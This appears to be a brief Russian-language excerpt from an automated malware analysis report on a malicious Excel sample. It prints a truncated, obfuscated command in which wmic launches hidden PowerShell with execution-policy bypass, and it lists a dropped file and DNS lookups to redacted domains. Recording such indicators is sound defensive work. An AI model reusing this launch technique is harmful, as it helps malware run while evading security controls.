Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' "ProcESs" "cALL" creaTE "POwerShELl -nOPRofilE -eXeC Bypass -WIndO 00001 -NOnInteracTIV Set ('1N') ([STRING][CHAR]34 ) ;Set ('4F'+'6') ([StrInG][ChAR]44) ; "\"&(${1N}{0}{1}${1N}-f 'sa...
- <Текущая директория>\ca821000
- <PATH_SAMPLE>.xls
- DNS ASK vi###enar.com
- DNS ASK vi###enanr.com